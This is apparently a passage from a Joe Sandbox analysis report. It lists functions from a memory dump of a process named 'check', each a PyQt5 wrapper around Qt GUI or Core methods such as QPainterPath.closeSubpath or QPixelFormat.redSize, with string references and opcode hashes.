Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: FromLongLong_Unsigned
String ID: QPixelFormat$brightnessSize$brightnessSize(self) -> int
API String ID: 3417993445-803185698
Opcode ID: 63c0b4e85649b7f1fe969ca31d1bb0c1384df4929f51009dd402d115f47c9626
Instruction ID: f01461a5d0241a75758b39366db9518ecf8b5c28d55b829d4b8d0a93a5c5dd87
Opcode Fuzzy Hash: 63c0b4e85649b7f1fe969ca31d1bb0c1384df4929f51009dd402d115f47c9626
Instruction Fuzzy Hash: 4C012875B08A46C2EB00DF54E8A96AD33A5FB44B64F954072CA5D07320DF7CDA59C740

Function 00007FFD86290AC0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 31COMMON

Download Yara Rule

APIs

?closeSubpath@QPainterPath@@QEAAXXZ.QT5GUI ref: 00007FFD86290B0B

Strings

QPainterPath, xrefs: 00007FFD86290B41
closeSubpath, xrefs: 00007FFD86290B3A
closeSubpath(self), xrefs: 00007FFD86290B2E

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?closePainterPath@@Subpath@
String ID: QPainterPath$closeSubpath$closeSubpath(self)
API String ID: 537118147-3960127820
Opcode ID: 4da12887e5d38554888a132d722a3a7383679bceb8cc942ffcad2ba1f2f14fe2
Instruction ID: db991676e3744676ce1d7d8be65b7e61c801dfe414ad64bf4d38e8b8ed786fb3
Opcode Fuzzy Hash: 4da12887e5d38554888a132d722a3a7383679bceb8cc942ffcad2ba1f2f14fe2
Instruction Fuzzy Hash: 3801E975B08A4AD1EB00DF55E8A86A933B4FB44BA4F954072CA5D03730DF7CE94AC340

Function 00007FFD86240F10 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 31COMMON

Download Yara Rule

APIs

?adjustSize@QTextDocument@@QEAAXXZ.QT5GUI ref: 00007FFD86240F5B

Strings

adjustSize(self), xrefs: 00007FFD86240F7E
adjustSize, xrefs: 00007FFD86240F8A
QTextDocument, xrefs: 00007FFD86240F91

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?adjustDocument@@Size@Text
String ID: QTextDocument$adjustSize$adjustSize(self)
API String ID: 3950186122-3621663493
Opcode ID: 81e7e3acd83c33889ec47c501bf11d56cec6c676d08c9e3a107478900def8665
Instruction ID: 60ae35b762caa1ad42d47b0e0f8ae9f33acf5a43e7198b5b07e070f731b67f4c
Opcode Fuzzy Hash: 81e7e3acd83c33889ec47c501bf11d56cec6c676d08c9e3a107478900def8665
Instruction Fuzzy Hash: 5601D375B08E4AC1EB00AF55E8A86AD33B4FB48BA4F954072CA5D43320DF7CE95AC340

Function 00007FFD86256EE0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31COMMON

Download Yara Rule

APIs

?geometry@QWindow@@QEBA?AVQRect@@XZ.QT5GUI ref: 00007FFD86256F30
PyLong_FromLong.PYTHON3 ref: 00007FFD86256F38

Strings

QWindow, xrefs: 00007FFD86256F5D
x(self) -> int, xrefs: 00007FFD86256F4A

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?geometry@FromLongLong_Rect@@Window@@
String ID: QWindow$x(self) -> int
API String ID: 464342472-973742986
Opcode ID: e283fff6a94fe4146df171cac8b5a77e2d39c9acd266e9eec8aad88dd471c10a
Instruction ID: ea7578b430113ea6973fe7b86354b36bf692d570483ad09ad7bdd84b52b53e56
Opcode Fuzzy Hash: e283fff6a94fe4146df171cac8b5a77e2d39c9acd266e9eec8aad88dd471c10a
Instruction Fuzzy Hash: 7701E9B5B18B4AC1DB00DF15E898AAD33A4FB44BA4F954072C64D03320DF7DE959C740

Function 00007FFD86248F70 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 31COMMON

Download Yara Rule

APIs

PyLong_FromUnsignedLong.PYTHON3 ref: 00007FFD86248FC5

Strings

QPixelFormat, xrefs: 00007FFD86248FEA
alphaSize(self) -> int, xrefs: 00007FFD86248FD7
alphaSize, xrefs: 00007FFD86248FE3

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: FromLongLong_Unsigned
String ID: QPixelFormat$alphaSize$alphaSize(self) -> int
API String ID: 3417993445-3108475478
Opcode ID: 4bd03def484bd1416d793f1d92d013bc395847b8df4dd4415d0d3605b3a8716b
Instruction ID: 240512211b136287695ef4afdc4937cfb60d0fac6dd4878177f8d7f05e495b02
Opcode Fuzzy Hash: 4bd03def484bd1416d793f1d92d013bc395847b8df4dd4415d0d3605b3a8716b
Instruction Fuzzy Hash: 67012835B18B4AC1EB00DF54E8A96AD33A4FB94BA4F954072CA5D47320DF7CDA49C380

Function 00007FFD86246FF0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 31COMMON

Download Yara Rule

APIs

PyLong_FromUnsignedLong.PYTHON3 ref: 00007FFD86247044

Strings

QPixelFormat, xrefs: 00007FFD86247069
redSize, xrefs: 00007FFD86247062
redSize(self) -> int, xrefs: 00007FFD86247056

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: FromLongLong_Unsigned
String ID: QPixelFormat$redSize$redSize(self) -> int
API String ID: 3417993445-2742221563
Opcode ID: 1f47ff0d19423555e0c243f017d351d10abf6dd619bb10dcef0bb44bd9091a0d
Instruction ID: acf464dcd1a80f5b6febfb1999eeee0a7809f6637dba11e1ec557dd2b601fd01
Opcode Fuzzy Hash: 1f47ff0d19423555e0c243f017d351d10abf6dd619bb10dcef0bb44bd9091a0d
Instruction Fuzzy Hash: 1F014F35B08B46C1EB00DF54E8A96AD33A5FB44B64F954076CA5D07320DF7DE949C380

Function 00007FFD86234E10 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 31COMMON

Download Yara Rule

APIs

?endMoveRows@QAbstractItemModel@@IEAAXXZ.QT5CORE ref: 00007FFD86234E5B

Strings

endMoveRows, xrefs: 00007FFD86234E8A
endMoveRows(self), xrefs: 00007FFD86234E7E
QStandardItemModel, xrefs: 00007FFD86234E91

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?endAbstractItemModel@@MoveRows@
String ID: QStandardItemModel$endMoveRows$endMoveRows(self)
API String ID: 1329736929-414010424
Opcode ID: 74c5ca51d3b46a38b5addfc7b7ea9bf77b49833c482e5008c9e607f7666fb7eb
Instruction ID: b87c9ec617ebad14dafab4c7923975371da99d2343ef9690f2e6d44f2ca889ad
Opcode Fuzzy Hash: 74c5ca51d3b46a38b5addfc7b7ea9bf77b49833c482e5008c9e607f7666fb7eb
Instruction Fuzzy Hash: 4C01E535B08B4A81EB00DF55E8A96A937B4FB58BA4F954072CA5D03330EF7CE95AC340

Function 00007FFD86276E00 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 31COMMON

Download Yara Rule

APIs

?normalize@QVector3D@@QEAAXXZ.QT5GUI ref: 00007FFD86276E4B

Strings

normalize(self), xrefs: 00007FFD86276E6E
normalize, xrefs: 00007FFD86276E7A
QVector3D, xrefs: 00007FFD86276E81

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?normalize@Vector3
String ID: QVector3D$normalize$normalize(self)
API String ID: 974211474-4019501818
Opcode ID: 27b1d4a6bd6b7198b870d7a4ba2300960e1259a33a511d3beb21a6f278e33c4a
Instruction ID: 6ba156a58c176de5ea80d9bea882995c72baa9f07a5a04c6f0e2135672f8bc0d
Opcode Fuzzy Hash: 27b1d4a6bd6b7198b870d7a4ba2300960e1259a33a511d3beb21a6f278e33c4a
Instruction Fuzzy Hash: F901A575B08A4A91EB009F55E8A9AA933B4FB48BA4F954072CA5D43330DF7DD95AC340

Function 00007FFD8625C200 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 31COMMON

Download Yara Rule

APIs

?detach@QPicture@@QEAAXXZ.QT5GUI ref: 00007FFD8625C24B

Strings

detach(self), xrefs: 00007FFD8625C26E
detach, xrefs: 00007FFD8625C27A
QPicture, xrefs: 00007FFD8625C281

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?detach@Picture@@
String ID: QPicture$detach$detach(self)
API String ID: 238502296-1327638773
Opcode ID: 51468bbcd26f713bf7debf88b3118b9f70ed038c0f40aefde5051f32d2c66688
Instruction ID: a2964037eeff74f34036565ba2b3d072e4c547d4b2b3237fedfc16eed4f04c6a
Opcode Fuzzy Hash: 51468bbcd26f713bf7debf88b3118b9f70ed038c0f40aefde5051f32d2c66688
Instruction Fuzzy Hash: BC01E575B08A4AC1EB00AF55E8A96AD33B4FB44BA4F954072CA4D43720EF7CE94AC340

Function 00007FFD8624CE00 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 31COMMON

Download Yara Rule

APIs

?deletePreviousChar@QTextCursor@@QEAAXXZ.QT5GUI ref: 00007FFD8624CE4B

Strings

deletePreviousChar(self), xrefs: 00007FFD8624CE6E
deletePreviousChar, xrefs: 00007FFD8624CE7A
QTextCursor, xrefs: 00007FFD8624CE81

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?deleteChar@Cursor@@PreviousText
String ID: QTextCursor$deletePreviousChar$deletePreviousChar(self)
API String ID: 3902758819-2441524240
Opcode ID: e5785fc128ff16c3521f5e3a3ae1e04bdc72fdbf732804d26d000e4890ade841
Instruction ID: 992854166a732a00bc658fa3b804c1ec37087235e33bb1931689c5da3bdaaa6b
Opcode Fuzzy Hash: e5785fc128ff16c3521f5e3a3ae1e04bdc72fdbf732804d26d000e4890ade841
Instruction Fuzzy Hash: 0201E575B08B4AD1EB00AF55E8A96AD33B4FB44BA4F954072CA5D43720DF7DE94AC340

Function 00007FFD86222E30 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 31COMMON

Download Yara Rule

APIs

